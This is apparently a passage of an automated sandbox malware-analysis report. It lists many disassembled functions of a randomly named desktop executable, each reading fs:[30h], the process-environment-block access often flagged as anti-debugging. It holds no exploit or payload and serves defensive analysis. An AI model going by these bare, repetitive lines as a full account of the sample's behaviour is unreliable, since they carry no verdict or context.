          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A52349 mov eax, dword ptr fs:[00000030h]3_2_01A52349
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A52349 mov eax, dword ptr fs:[00000030h]3_2_01A52349
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A52349 mov eax, dword ptr fs:[00000030h]3_2_01A52349
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A78350 mov ecx, dword ptr fs:[00000030h]3_2_01A78350
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5035C mov eax, dword ptr fs:[00000030h]3_2_01A5035C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5035C mov eax, dword ptr fs:[00000030h]3_2_01A5035C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5035C mov eax, dword ptr fs:[00000030h]3_2_01A5035C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5035C mov ecx, dword ptr fs:[00000030h]3_2_01A5035C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5035C mov eax, dword ptr fs:[00000030h]3_2_01A5035C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5035C mov eax, dword ptr fs:[00000030h]3_2_01A5035C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9A352 mov eax, dword ptr fs:[00000030h]3_2_01A9A352
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A662A0 mov eax, dword ptr fs:[00000030h]3_2_01A662A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A662A0 mov ecx, dword ptr fs:[00000030h]3_2_01A662A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A662A0 mov eax, dword ptr fs:[00000030h]3_2_01A662A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A662A0 mov eax, dword ptr fs:[00000030h]3_2_01A662A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A662A0 mov eax, dword ptr fs:[00000030h]3_2_01A662A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A662A0 mov eax, dword ptr fs:[00000030h]3_2_01A662A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E284 mov eax, dword ptr fs:[00000030h]3_2_01A0E284
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E284 mov eax, dword ptr fs:[00000030h]3_2_01A0E284
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A50283 mov eax, dword ptr fs:[00000030h]3_2_01A50283
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A50283 mov eax, dword ptr fs:[00000030h]3_2_01A50283
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A50283 mov eax, dword ptr fs:[00000030h]3_2_01A50283
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E02A0 mov eax, dword ptr fs:[00000030h]3_2_019E02A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E02A0 mov eax, dword ptr fs:[00000030h]3_2_019E02A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DA2C3 mov eax, dword ptr fs:[00000030h]3_2_019DA2C3
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DA2C3 mov eax, dword ptr fs:[00000030h]3_2_019DA2C3
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DA2C3 mov eax, dword ptr fs:[00000030h]3_2_019DA2C3
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DA2C3 mov eax, dword ptr fs:[00000030h]3_2_019DA2C3
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DA2C3 mov eax, dword ptr fs:[00000030h]3_2_019DA2C3
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA62D6 mov eax, dword ptr fs:[00000030h]3_2_01AA62D6
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E02E1 mov eax, dword ptr fs:[00000030h]3_2_019E02E1
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E02E1 mov eax, dword ptr fs:[00000030h]3_2_019E02E1
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E02E1 mov eax, dword ptr fs:[00000030h]3_2_019E02E1
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019C823B mov eax, dword ptr fs:[00000030h]3_2_019C823B
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D6259 mov eax, dword ptr fs:[00000030h]3_2_019D6259
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CA250 mov eax, dword ptr fs:[00000030h]3_2_019CA250
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A80274 mov eax, dword ptr fs:[00000030h]3_2_01A80274
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A80274 mov eax, dword ptr fs:[00000030h]3_2_01A80274
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A80274 mov eax, dword ptr fs:[00000030h]3_2_01A80274
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A80274 mov eax, dword ptr fs:[00000030h]3_2_01A80274
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A80274 mov eax, dword ptr fs:[00000030h]3_2_01A80274
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A80274 mov eax, dword ptr fs:[00000030h]3_2_01A80274
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A80274 mov eax, dword ptr fs:[00000030h]3_2_01A80274
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A80274 mov eax, dword ptr fs:[00000030h]3_2_01A80274
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A80274 mov eax, dword ptr fs:[00000030h]3_2_01A80274
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A80274 mov eax, dword ptr fs:[00000030h]3_2_01A80274
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A80274 mov eax, dword ptr fs:[00000030h]3_2_01A80274
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A80274 mov eax, dword ptr fs:[00000030h]3_2_01A80274
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A58243 mov eax, dword ptr fs:[00000030h]3_2_01A58243
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A58243 mov ecx, dword ptr fs:[00000030h]3_2_01A58243
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019C826B mov eax, dword ptr fs:[00000030h]3_2_019C826B
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA625D mov eax, dword ptr fs:[00000030h]3_2_01AA625D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A8A250 mov eax, dword ptr fs:[00000030h]3_2_01A8A250
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A8A250 mov eax, dword ptr fs:[00000030h]3_2_01A8A250
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D4260 mov eax, dword ptr fs:[00000030h]3_2_019D4260
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D4260 mov eax, dword ptr fs:[00000030h]3_2_019D4260
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D4260 mov eax, dword ptr fs:[00000030h]3_2_019D4260
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A505A7 mov eax, dword ptr fs:[00000030h]3_2_01A505A7
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A505A7 mov eax, dword ptr fs:[00000030h]3_2_01A505A7
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A505A7 mov eax, dword ptr fs:[00000030h]3_2_01A505A7
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D2582 mov eax, dword ptr fs:[00000030h]3_2_019D2582
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D2582 mov ecx, dword ptr fs:[00000030h]3_2_019D2582
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A04588 mov eax, dword ptr fs:[00000030h]3_2_01A04588
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F45B1 mov eax, dword ptr fs:[00000030h]3_2_019F45B1
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F45B1 mov eax, dword ptr fs:[00000030h]3_2_019F45B1
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E59C mov eax, dword ptr fs:[00000030h]3_2_01A0E59C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D65D0 mov eax, dword ptr fs:[00000030h]3_2_019D65D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0C5ED mov eax, dword ptr fs:[00000030h]3_2_01A0C5ED
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0C5ED mov eax, dword ptr fs:[00000030h]3_2_01A0C5ED
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E5CF mov eax, dword ptr fs:[00000030h]3_2_01A0E5CF
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E5CF mov eax, dword ptr fs:[00000030h]3_2_01A0E5CF
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0A5D0 mov eax, dword ptr fs:[00000030h]3_2_01A0A5D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0A5D0 mov eax, dword ptr fs:[00000030h]3_2_01A0A5D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FE5E7 mov eax, dword ptr fs:[00000030h]3_2_019FE5E7
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FE5E7 mov eax, dword ptr fs:[00000030h]3_2_019FE5E7
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FE5E7 mov eax, dword ptr fs:[00000030h]3_2_019FE5E7
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FE5E7 mov eax, dword ptr fs:[00000030h]3_2_019FE5E7
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FE5E7 mov eax, dword ptr fs:[00000030h]3_2_019FE5E7
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FE5E7 mov eax, dword ptr fs:[00000030h]3_2_019FE5E7
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FE5E7 mov eax, dword ptr fs:[00000030h]3_2_019FE5E7
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FE5E7 mov eax, dword ptr fs:[00000030h]3_2_019FE5E7
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D25E0 mov eax, dword ptr fs:[00000030h]3_2_019D25E0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FE53E mov eax, dword ptr fs:[00000030h]3_2_019FE53E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FE53E mov eax, dword ptr fs:[00000030h]3_2_019FE53E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FE53E mov eax, dword ptr fs:[00000030h]3_2_019FE53E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FE53E mov eax, dword ptr fs:[00000030h]3_2_019FE53E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FE53E mov eax, dword ptr fs:[00000030h]3_2_019FE53E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A66500 mov eax, dword ptr fs:[00000030h]3_2_01A66500
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA4500 mov eax, dword ptr fs:[00000030h]3_2_01AA4500
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA4500 mov eax, dword ptr fs:[00000030h]3_2_01AA4500
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA4500 mov eax, dword ptr fs:[00000030h]3_2_01AA4500
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA4500 mov eax, dword ptr fs:[00000030h]3_2_01AA4500
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA4500 mov eax, dword ptr fs:[00000030h]3_2_01AA4500
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA4500 mov eax, dword ptr fs:[00000030h]3_2_01AA4500
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA4500 mov eax, dword ptr fs:[00000030h]3_2_01AA4500
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0535 mov eax, dword ptr fs:[00000030h]3_2_019E0535
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0535 mov eax, dword ptr fs:[00000030h]3_2_019E0535
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0535 mov eax, dword ptr fs:[00000030h]3_2_019E0535
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0535 mov eax, dword ptr fs:[00000030h]3_2_019E0535
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0535 mov eax, dword ptr fs:[00000030h]3_2_019E0535
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0535 mov eax, dword ptr fs:[00000030h]3_2_019E0535
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0656A mov eax, dword ptr fs:[00000030h]3_2_01A0656A
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0656A mov eax, dword ptr fs:[00000030h]3_2_01A0656A
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0656A mov eax, dword ptr fs:[00000030h]3_2_01A0656A
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D8550 mov eax, dword ptr fs:[00000030h]3_2_019D8550
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D8550 mov eax, dword ptr fs:[00000030h]3_2_019D8550
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A044B0 mov ecx, dword ptr fs:[00000030h]3_2_01A044B0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5A4B0 mov eax, dword ptr fs:[00000030h]3_2_01A5A4B0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A8A49A mov eax, dword ptr fs:[00000030h]3_2_01A8A49A
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D64AB mov eax, dword ptr fs:[00000030h]3_2_019D64AB
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D04E5 mov ecx, dword ptr fs:[00000030h]3_2_019D04E5
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A56420 mov eax, dword ptr fs:[00000030h]3_2_01A56420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A56420 mov eax, dword ptr fs:[00000030h]3_2_01A56420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A56420 mov eax, dword ptr fs:[00000030h]3_2_01A56420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A56420 mov eax, dword ptr fs:[00000030h]3_2_01A56420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A56420 mov eax, dword ptr fs:[00000030h]3_2_01A56420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A56420 mov eax, dword ptr fs:[00000030h]3_2_01A56420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A56420 mov eax, dword ptr fs:[00000030h]3_2_01A56420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0A430 mov eax, dword ptr fs:[00000030h]3_2_01A0A430
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A08402 mov eax, dword ptr fs:[00000030h]3_2_01A08402
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A08402 mov eax, dword ptr fs:[00000030h]3_2_01A08402
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A08402 mov eax, dword ptr fs:[00000030h]3_2_01A08402
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CC427 mov eax, dword ptr fs:[00000030h]3_2_019CC427
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CE420 mov eax, dword ptr fs:[00000030h]3_2_019CE420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CE420 mov eax, dword ptr fs:[00000030h]3_2_019CE420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CE420 mov eax, dword ptr fs:[00000030h]3_2_019CE420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019C645D mov eax, dword ptr fs:[00000030h]3_2_019C645D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F245A mov eax, dword ptr fs:[00000030h]3_2_019F245A
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5C460 mov ecx, dword ptr fs:[00000030h]3_2_01A5C460
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E443 mov eax, dword ptr fs:[00000030h]3_2_01A0E443
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E443 mov eax, dword ptr fs:[00000030h]3_2_01A0E443
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E443 mov eax, dword ptr fs:[00000030h]3_2_01A0E443
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E443 mov eax, dword ptr fs:[00000030h]3_2_01A0E443
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E443 mov eax, dword ptr fs:[00000030h]3_2_01A0E443
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E443 mov eax, dword ptr fs:[00000030h]3_2_01A0E443
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E443 mov eax, dword ptr fs:[00000030h]3_2_01A0E443
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E443 mov eax, dword ptr fs:[00000030h]3_2_01A0E443
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019FA470 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019FA470 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019FA470 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A8A456 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A847A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A7678E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D07AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A5E7E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019DC7C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A507C3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D47FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D47FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019F27ED mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019F27ED mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019F27ED mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0C720 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0C720 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D0710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A4C730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0273C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0273C mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0273C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0C700 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A00710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D0750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0674D mov esi, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0674D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0674D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D8770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A54755 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A12750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A12750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A5E75D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0C6A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D4690 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D4690 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A066B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A506F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A506F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A4E6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A4E6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A4E6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A4E6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0A6C7 mov ebx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0A6C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A06620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A08620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E260B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E260B mov eax, dword ptr fs:[00000030h]
